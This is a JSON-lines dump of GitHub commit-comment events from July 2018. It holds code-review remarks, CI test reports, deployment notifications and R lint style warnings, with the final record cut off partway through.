{"id":"7965172210","type":"CommitCommentEvent","actor":{"login":"rogerluan"},"repo":{"name":"serralvo/TextFieldCounter"},"payload":{"comment":{"id":29707671,"position":15,"line":19,"path":"TextFieldCounter.swift","commit_id":"9ab9bc5b8bb7313249dadfa7952d6af03e5df9c4","created_at":"2018-07-14T04:11:04Z","updated_at":"2018-07-14T04:11:04Z","author_association":"COLLABORATOR","body":"Code style: I like to call these kind of properties e.g. `_delegate` :) "}},"created_at":"2018-07-14T04:11:04Z"}
{"id":"7965172624","type":"CommitCommentEvent","actor":{"login":"abdourahimjallow"},"repo":{"name":"github/fetch"},"payload":{"comment":{"id":29707673,"position":19,"line":446,"path":"fetch.js","commit_id":"1b56f166a9c2019d7b0fc0a45ad3ee4dde45ddc0","created_at":"2018-07-14T04:11:29Z","updated_at":"2018-07-14T04:11:29Z","author_association":"NONE","body":"Cool"}},"created_at":"2018-07-14T04:11:29Z"}
{"id":"7965174576","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29707674,"position":null,"line":null,"path":null,"commit_id":"c0ced0fa8515e0281476e31838684e4c8ab8c7e9","created_at":"2018-07-14T04:13:21Z","updated_at":"2018-07-14T04:13:21Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - i386-Windows-7-VisualStudio-14: OK (3312 of 3312 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c0ced0fa8515e0281476e31838684e4c8ab8c7e9-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c0ced0fa8515e0281476e31838684e4c8ab8c7e9-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T04:13:21Z"}
{"id":"7965177247","type":"CommitCommentEvent","actor":{"login":"rogerluan"},"repo":{"name":"serralvo/TextFieldCounter"},"payload":{"comment":{"id":29707679,"position":87,"line":264,"path":"TextFieldCounter.swift","commit_id":"9ab9bc5b8bb7313249dadfa7952d6af03e5df9c4","created_at":"2018-07-14T04:15:49Z","updated_at":"2018-07-14T04:15:49Z","author_association":"COLLABORATOR","body":"Code style: you can omit `_:` in this line and also up there ☝️😁 "}},"created_at":"2018-07-14T04:15:49Z"}
{"id":"7965178913","type":"CommitCommentEvent","actor":{"login":"geeknik"},"repo":{"name":"mapbox/protozero"},"payload":{"comment":{"id":29707680,"position":null,"line":null,"path":null,"commit_id":"ac48bc1915f74aebd90324b45ffe9b696229391b","created_at":"2018-07-14T04:17:17Z","updated_at":"2018-07-14T04:17:17Z","author_association":"NONE","body":"https://github.com/mapbox/vtzero/pull/42"}},"created_at":"2018-07-14T04:17:17Z"}
{"id":"7965182355","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29707682,"position":null,"line":null,"path":null,"commit_id":"82b3bca3cb7500f1ba658b9619870fcba1fc2e2e","created_at":"2018-07-14T04:20:08Z","updated_at":"2018-07-14T04:20:08Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#pr-4](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#pr-4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-4-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-14T04:20:08Z"}
{"id":"7965191551","type":"CommitCommentEvent","actor":{"login":"roychowd"},"repo":{"name":"AnkushSharma2698/MusicalMap"},"payload":{"comment":{"id":29707700,"position":null,"line":null,"path":null,"commit_id":"5d2d68d0df4f03c6a48c0ea23662ad949ddc5b31","created_at":"2018-07-14T04:29:30Z","updated_at":"2018-07-14T04:29:30Z","author_association":"COLLABORATOR","body":"GREAT JOB!!!"}},"created_at":"2018-07-14T04:29:30Z"}
{"id":"7965193105","type":"CommitCommentEvent","actor":{"login":"yongPhone"},"repo":{"name":"2018TopViewBack-end/DailyNotebooks"},"payload":{"comment":{"id":29707708,"position":null,"line":null,"path":null,"commit_id":"6810eb5c3238c4a6aed54f8864e19fc5165b0511","created_at":"2018-07-14T04:30:55Z","updated_at":"2018-07-14T04:30:55Z","author_association":"NONE","body":"笔记写得挺有趣的，但是rebace应该只是个参数，不是git的命令hh"}},"created_at":"2018-07-14T04:30:55Z"}
{"id":"7965193375","type":"CommitCommentEvent","actor":{"login":"geraldvillorente"},"repo":{"name":"geraldvillorente/build-tools-demo"},"payload":{"comment":{"id":29707709,"position":null,"line":null,"path":null,"commit_id":"d33d08d8a47e4811e9634dfb580738782e235382","created_at":"2018-07-14T04:31:11Z","updated_at":"2018-07-14T04:31:11Z","author_association":"OWNER","body":"Created multidev environment [build-tools-demo#ci-11](https://dashboard.pantheon.io/sites/298d3692-c016-408b-972b-854d0b0302a9#ci-11).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-11-build-tools-demo.pantheonsite.io/)"}},"created_at":"2018-07-14T04:31:11Z"}
{"id":"7965196222","type":"CommitCommentEvent","actor":{"login":"hackleberryfinn"},"repo":{"name":"hackleberryfinn/Global-Citizen-Hackleberry-Finn"},"payload":{"comment":{"id":29707712,"position":null,"line":null,"path":null,"commit_id":"df9db9f1ebb4fecf334b3c77b719ad10eaa83f18","created_at":"2018-07-14T04:34:10Z","updated_at":"2018-07-14T04:34:10Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/f3f56358-197d-4212-bb99-0d95d54bfc86?env_id=ibm%3Ayp%3Aus-south \"Global-Citizen-Hackleberry-Finn\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/baf2eb90-00e5-408f-9f5d-d47769aab3be?env_id=ibm%3Ayp%3Aus-south \"Global-Citizen-Hackleberry-Finn\") deployed [Global-Citizen-Hackleberry-Finn](https://github.com/hackleberryfinn/Global-Citizen-Hackleberry-Finn/releases/tag/deploy-ibm-yp-us-south-luke.hutchinson-live.com.au-dev-20180714-043408 \"deploy-ibm-yp-us-south-luke.hutchinson-live.com.au-dev-20180714-043408\") to [dev](https://console.bluemix.net/apps/8b984503-074c-42ab-b13c-92e494596da3?env_id=ibm:yp:us-south \"ibm:yp:us-south:luke.hutchinson@live.com.au:dev\"), including this commit"}},"created_at":"2018-07-14T04:34:10Z"}
{"id":"7965198636","type":"CommitCommentEvent","actor":{"login":"RubenGavidia"},"repo":{"name":"RubenGavidia/C_HowToProgram-Deitel-Multilingual_Codes_RE"},"payload":{"comment":{"id":29707713,"position":null,"line":null,"path":null,"commit_id":"a9be4be799f0cc802ee387941967c1689e25421f","created_at":"2018-07-14T04:36:38Z","updated_at":"2018-07-14T04:36:38Z","author_association":"OWNER","body":"good"}},"created_at":"2018-07-14T04:36:38Z"}
{"id":"7965198941","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29707714,"position":null,"line":null,"path":null,"commit_id":"a36cba8e3331b010258550cf963b1310ea7a1be8","created_at":"2018-07-14T04:36:55Z","updated_at":"2018-07-14T04:36:55Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180714-043654 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180714-043654\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-14T04:36:55Z"}
{"id":"7965199234","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29707715,"position":null,"line":null,"path":null,"commit_id":"4d89755748773cfc357d0cbaf4f8e2cabc2c81fe","created_at":"2018-07-14T04:37:11Z","updated_at":"2018-07-14T04:37:11Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2973 of 2974 tests passed, 27 test warnings)\n\nMessages:\n\n * 16 tests had: AUD diffs.\n * 11 tests had: ERR diffs.\n * 4 tests had: RDD diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 627\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4d89755748773cfc357d0cbaf4f8e2cabc2c81fe-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4d89755748773cfc357d0cbaf4f8e2cabc2c81fe-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-14T04:37:11Z"}
{"id":"7965200419","type":"CommitCommentEvent","actor":{"login":"eburnham18"},"repo":{"name":"eburnham18/First-Project"},"payload":{"comment":{"id":29707716,"position":null,"line":null,"path":null,"commit_id":"d82ea7cced3ddde64bc7d86f91ba86e1f3714e17","created_at":"2018-07-14T04:38:25Z","updated_at":"2018-07-14T04:38:25Z","author_association":"OWNER","body":"\r\n\r\n[User-Made Scripts.zip](https://github.com/eburnham18/First-Project/files/2194654/User-Made.Scripts.zip)\r\nThis is the code I am using"}},"created_at":"2018-07-14T04:38:25Z"}
{"id":"7965200644","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29707717,"position":10,"line":65,"path":"android/src/com/frostwire/android/offers/MoPubAdNetwork.java","commit_id":"03afbc85311ea7e405577bd791bdc9ccf7ebf125","created_at":"2018-07-14T04:38:41Z","updated_at":"2018-07-14T04:38:41Z","author_association":"COLLABORATOR","body":"👍 👍 "}},"created_at":"2018-07-14T04:38:41Z"}
{"id":"7965201782","type":"CommitCommentEvent","actor":{"login":"dklages20"},"repo":{"name":"dklages20/RitoBot"},"payload":{"comment":{"id":29707718,"position":76,"line":76,"path":"RitoBot/src/main/test/RitoBot/user/test/GearSetTests.java","commit_id":"820a69b8473b52d853fbac96cdb430737378dce4","created_at":"2018-07-14T04:39:56Z","updated_at":"2018-07-14T04:39:56Z","author_association":"OWNER","body":"Should probably go back and remove all of these gearset = new Gearset() because they aren't needed. Resolved Issue by making changes in the class\r\n"}},"created_at":"2018-07-14T04:39:56Z"}
{"id":"7965201858","type":"CommitCommentEvent","actor":{"login":"rmit-s3665001-david-brenecki"},"repo":{"name":"rmit-s3665001-david-brenecki/website"},"payload":{"comment":{"id":29707719,"position":1,"line":1,"path":"lipsum.txt","commit_id":"e73f298e1243cd017e2e69ca80a282f1adede889","created_at":"2018-07-14T04:40:01Z","updated_at":"2018-07-14T04:40:01Z","author_association":"OWNER","body":"## lisum really?\r\nyes realy"}},"created_at":"2018-07-14T04:40:01Z"}
{"id":"7965202266","type":"CommitCommentEvent","actor":{"login":"geraldvillorente"},"repo":{"name":"geraldvillorente/build-tools-demo"},"payload":{"comment":{"id":29707721,"position":null,"line":null,"path":null,"commit_id":"db0d9f5a427d67a677cbd916349c6be0cdf73565","created_at":"2018-07-14T04:40:25Z","updated_at":"2018-07-14T04:40:25Z","author_association":"OWNER","body":"Created multidev environment [build-tools-demo#ci-14](https://dashboard.pantheon.io/sites/298d3692-c016-408b-972b-854d0b0302a9#ci-14).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-14-build-tools-demo.pantheonsite.io/)"}},"created_at":"2018-07-14T04:40:25Z"}
{"id":"7965203545","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29707723,"position":null,"line":null,"path":null,"commit_id":"4d89755748773cfc357d0cbaf4f8e2cabc2c81fe","created_at":"2018-07-14T04:41:44Z","updated_at":"2018-07-14T04:41:44Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-4d89755748773cfc357d0cbaf4f8e2cabc2c81fe-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-14T04:41:44Z"}
{"id":"7965206830","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29707726,"position":null,"line":null,"path":null,"commit_id":"ece3c0d54c84bc83d7a4a16efb557e0ee0c13587","created_at":"2018-07-14T04:44:55Z","updated_at":"2018-07-14T04:44:55Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180714-044453 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180714-044453\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-14T04:44:55Z"}
{"id":"7965208066","type":"CommitCommentEvent","actor":{"login":"yisuoyanyuwhr"},"repo":{"name":"yisuoyanyuwhr/helloworld"},"payload":{"comment":{"id":29707730,"position":null,"line":null,"path":null,"commit_id":"06b81c0ea88c9592f1caf3cfc472830084f1af97","created_at":"2018-07-14T04:46:03Z","updated_at":"2018-07-14T04:46:03Z","author_association":"OWNER","body":"111"}},"created_at":"2018-07-14T04:46:03Z"}
{"id":"7965211213","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29707732,"position":null,"line":null,"path":null,"commit_id":"c0ced0fa8515e0281476e31838684e4c8ab8c7e9","created_at":"2018-07-14T04:49:19Z","updated_at":"2018-07-14T04:49:19Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - Win64-Windows-7-VisualStudio-14: OK (3312 of 3312 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c0ced0fa8515e0281476e31838684e4c8ab8c7e9-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c0ced0fa8515e0281476e31838684e4c8ab8c7e9-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T04:49:19Z"}
{"id":"7965212648","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29707735,"position":null,"line":null,"path":null,"commit_id":"6587b435d1842a64052138502b1315a326fcf147","created_at":"2018-07-14T04:50:47Z","updated_at":"2018-07-14T04:50:47Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180714-045045 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180714-045045\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-14T04:50:47Z"}
{"id":"7965213646","type":"CommitCommentEvent","actor":{"login":"Mhiho"},"repo":{"name":"Mhiho/catsChildrenAndTheProject"},"payload":{"comment":{"id":29707737,"position":1,"line":1,"path":"src/store/actions/firebase.js","commit_id":"7a9a70a5c9a3dd3031a37c8733a5c445cbad4e14","created_at":"2018-07-14T04:51:46Z","updated_at":"2018-07-14T04:51:46Z","author_association":"OWNER","body":"New database set!"}},"created_at":"2018-07-14T04:51:46Z"}
{"id":"7965216051","type":"CommitCommentEvent","actor":{"login":"Tony120914"},"repo":{"name":"Tony120914/Beldum-Bot"},"payload":{"comment":{"id":29707741,"position":null,"line":null,"path":null,"commit_id":"a4d3d9a5692303cce9a0a6f719b26baaf65a8b7f","created_at":"2018-07-14T04:54:05Z","updated_at":"2018-07-14T04:54:05Z","author_association":"OWNER","body":"icon*"}},"created_at":"2018-07-14T04:54:05Z"}
{"id":"7965216550","type":"CommitCommentEvent","actor":{"login":"LuisRAnrrango"},"repo":{"name":"LuisRAnrrango/Sprint2-Software-II"},"payload":{"comment":{"id":29707742,"position":null,"line":null,"path":null,"commit_id":"3e9d8681355c21971f73a0e69216929862802dd8","created_at":"2018-07-14T04:54:31Z","updated_at":"2018-07-14T04:54:31Z","author_association":"OWNER","body":"Verificación de atributos de cajeros"}},"created_at":"2018-07-14T04:54:31Z"}
{"id":"7965217034","type":"CommitCommentEvent","actor":{"login":"cgcloud-jenkins"},"repo":{"name":"vgteam/vg"},"payload":{"comment":{"id":29707743,"position":null,"line":null,"path":null,"commit_id":"59336df5d686f727ada03e90b26cba2eaa9bc04f","created_at":"2018-07-14T04:55:03Z","updated_at":"2018-07-14T04:55:03Z","author_association":"NONE","body":"[Jenkins vg tests](http://jenkins.cgcloud.info/job/vg/2005/) complete for merge to master.  View the [full report here](http://cgl-pipeline-inputs.s3.amazonaws.com/vg_cgl/vg_ci/jenkins_reports/branch/master/index.html).\n\n19 tests passed, 0 tests failed and 10 tests skipped in 21524 seconds\n\nTests produced 2926 warnings. 2926 were for lower-than-expected alignment scores\n\n"}},"created_at":"2018-07-14T04:55:03Z"}
{"id":"7965217969","type":"CommitCommentEvent","actor":{"login":"vector-of-bool"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":29707744,"position":45,"line":73,"path":"src/vs/workbench/api/node/extHostProgress.ts","commit_id":"098cf01a2e35d00206ec29c4e95cfc7d308afdc6","created_at":"2018-07-14T04:55:56Z","updated_at":"2018-07-14T04:55:56Z","author_association":"NONE","body":"Done. Three days later. #54295"}},"created_at":"2018-07-14T04:55:56Z"}
{"id":"7965218337","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29707746,"position":null,"line":null,"path":null,"commit_id":"ba854f3a512f08f96fcb9bc8136354227a6b5b10","created_at":"2018-07-14T04:56:16Z","updated_at":"2018-07-14T04:56:16Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180714-045615 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180714-045615\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-14T04:56:16Z"}
{"id":"7965218806","type":"CommitCommentEvent","actor":{"login":"Manuel-777"},"repo":{"name":"Manuel-777/MTG-Arena-Tool"},"payload":{"comment":{"id":29707747,"position":null,"line":null,"path":null,"commit_id":"4e188e16131cb30643e2916a811e5d957afb3e58","created_at":"2018-07-14T04:56:45Z","updated_at":"2018-07-14T04:56:45Z","author_association":"OWNER","body":"Issue referenced on #3 "}},"created_at":"2018-07-14T04:56:45Z"}
{"id":"7965224249","type":"CommitCommentEvent","actor":{"login":"saifabrar"},"repo":{"name":"Project-Bonfire/FRASER_Co-Simulation"},"payload":{"comment":{"id":29707766,"position":null,"line":null,"path":null,"commit_id":"398f5a405b0f77a9345b07f1c11fd458e31c5df5","created_at":"2018-07-14T05:02:28Z","updated_at":"2018-07-14T05:02:28Z","author_association":"COLLABORATOR","body":"Updated TLM .h and .cpp files"}},"created_at":"2018-07-14T05:02:28Z"}
{"id":"7965224969","type":"CommitCommentEvent","actor":{"login":"nemchik"},"repo":{"name":"GhostWriters/DockSTARTer"},"payload":{"comment":{"id":29707768,"position":null,"line":null,"path":null,"commit_id":"4e5e914b26b799deae7afacfeea0e5222becf90e","created_at":"2018-07-14T05:03:14Z","updated_at":"2018-07-14T05:03:14Z","author_association":"CONTRIBUTOR","body":"This needs a few if statements to check when variables are left blank and probably throw a fatal.\r\n\r\nNext step after these pieces is to update existing .env files using the example file, but that might wait for a separate PR so that this can merge to master and be used in the GUI ASAP."}},"created_at":"2018-07-14T05:03:14Z"}
{"id":"7965229243","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29707784,"position":null,"line":null,"path":null,"commit_id":"8b1e5a092fa43a51a252f62cd82ea6373d632421","created_at":"2018-07-14T05:07:40Z","updated_at":"2018-07-14T05:07:40Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (Unknown) - x86_64-MacOS-10.9-clang: OK (3316 of 3316 tests passed, 9 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 1 test had: ERR diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b1e5a092fa43a51a252f62cd82ea6373d632421-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b1e5a092fa43a51a252f62cd82ea6373d632421-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T05:07:40Z"}
{"id":"7965231740","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.tools"},"payload":{"comment":{"id":29707788,"position":null,"line":null,"path":null,"commit_id":"9b5b7595263bb914e250679323d5ebc76b72aafe","created_at":"2018-07-14T05:10:03Z","updated_at":"2018-07-14T05:10:03Z","author_association":"NONE","body":"[inst/examples/example_distanceFromEachPoint.R:37:2:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/inst/examples/example_distanceFromEachPoint.R#L37) *style:* **Commented code should be removed.**\n```r\n​#beginCluster(3) # can do parallel\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_distanceFromEachPoint.R:40:2:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/inst/examples/example_distanceFromEachPoint.R#L40) *style:* **Commented code should be removed.**\n```r\n​#endCluster() # if beginCluster was run\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:82:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L82) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( method != \"RMexp\") {\n        ^\n```\n[R/initialize.R:237:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L237) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  X <- c(jitter(sort(rbeta(nPoints, betaPar, betaPar) * (maxX - minX) + minX)),\n  ^\n```\n[R/initialize.R:239:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L239) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Y <- c(jitter(sort(rbeta(nPoints / 2, betaPar, betaPar) * (maxY - meanY) + meanY)),\n  ^\n```\n[R/initialize.R:243:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L243) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Sr1 <- Polygon(cbind(X + xAdd, Y + yAdd))\n  ^~~\n```\n[R/initialize.R:244:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L244) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Srs1 <- Polygons(list(Sr1), \"s1\")\n  ^~~~\n```\n[R/initialize.R:341:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L341) *style:* **Commented code should be removed.**\n```r\n​# ### INCORPORATE RELEVANT PARTS OF THIS OLD INIT FUNCTION INTO INITCOORDS()\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:346:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L346) *style:* **Commented code should be removed.**\n```r\n​# #'                      (currently only \\code{RasterLayer} or\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:347:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L347) *style:* **Commented code should be removed.**\n```r\n​# #'                      \\code{SpatialPolygonsDataFrame}) accepted.\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:357:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L357) *style:* **Commented code should be removed.**\n```r\n​#     ext <- extent(agentlocation)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:359:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L359) *style:* **Commented code should be removed.**\n```r\n​#       #            nonNAs <- !is.na(getvalue(probinit))\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:360:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L360) *style:* **Commented code should be removed.**\n```r\n​#       nonNAs <- !is.na(getValues(probinit))\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:361:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L361) *style:* **Commented code should be removed.**\n```r\n​#       wh.nonNAs <- which(nonNAs)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:362:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L362) *style:* **Commented code should be removed.**\n```r\n​#       #            ProbInit.v <- cumsum(getvalue(probinit)[nonNAs])\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:363:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/9b5b7595263bb914e250679323d5ebc76b72aafe/R/initialize.R#L363) *style:* **Commented code should be removed.**\n```r\n​#       ProbInit.v <- 